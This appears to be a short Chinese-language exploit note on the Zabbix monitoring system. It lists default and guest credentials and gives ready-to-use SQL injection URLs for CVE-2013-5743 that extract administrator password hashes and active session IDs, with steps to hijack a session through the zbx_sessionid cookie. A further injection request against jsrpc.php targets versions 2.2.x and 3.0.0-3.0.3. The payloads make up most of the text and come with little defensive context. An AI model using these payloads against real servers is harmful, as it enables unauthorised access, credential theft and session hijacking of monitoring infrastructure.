0x01 zabbix的默认账户与密码
默认口令 admin/zabbix
或者是guest/空 ,(系统内置账户)可以多试试
0x02 zabbix注入 CVE-2013-5743(影响版本 1.8.5-1.8.9)
前提guest账户可以登录
exp利用:
http://zabbix.server/zabbix/httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
可以直接爆出管理员账户和密码MD5值
也可以注入出管理员的session
http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29
用获取到的session替换cookie中zbx_sessionid中的值:
0x03 zabbix再一注入 CVE-2014-9450
详情:
http://www.wooyun.org/bugs/wooyun-2010-072075 待研究下poc
0x04
/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1影响范围:2.2.x, 3.0.0-3.0.3
参考至:http://bobao.360.cn/news/detail/3462.html
扫一扫
2578
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
